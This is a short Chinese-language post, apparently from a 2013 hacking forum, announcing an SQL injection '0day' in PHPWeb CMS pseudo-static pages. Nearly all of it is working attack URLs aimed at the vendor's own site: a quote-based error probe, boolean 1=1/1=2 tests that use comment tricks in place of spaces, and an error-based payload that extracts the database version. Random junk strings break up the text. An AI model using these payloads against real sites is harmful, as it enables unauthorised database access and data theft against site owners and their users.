phpweb伪静态页面注入0day

admin

phpweb所有的整站程序伪静态页面都存在sql注入

主站：http://phpweb.net/
+ F( R& m- g. c3 F, @3 U& ?5 M加’检测：
, d0 L; ?3 r8 E' k8 h
http://www.phpweb.net/down/html/?772′.html
6 q3 K) L2 V0 O5 {( ]
* `8 Q+ m6 n) d3 g8 m/ Y! z出错
9 @3 k7 Z1 l: E8 c3 @/ I存在注入。
不能用空格，只能用/*罗
8 b0 }% A& S9 `) i! s* U7 y* hhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常

http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
% j. o  z+ b$ X" E爆数据库版本：

; g! ~* S4 s: b( j7 @  u+ W$ i?
1
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
' c( q9 O- B, z# X$ |4 c更新日期: 2013-01-03 13:39:50